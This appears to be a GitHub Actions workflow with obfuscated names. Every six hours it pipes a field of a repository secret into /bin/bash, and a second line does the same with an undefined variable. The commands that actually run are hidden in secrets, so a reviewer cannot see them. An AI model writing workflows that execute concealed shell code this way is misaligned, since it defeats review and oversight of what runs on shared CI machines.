name: yingzhongyuanyong

on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'

jobs:  # 1947
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yingzhongyuanyong
        env:
          z20: ${{ secrets.z20 }}
        run: |
          echo $z20 | jq -r .s533 | /bin/bash
          echo $hbv76992 | jq -r .if606 | /bin/bash

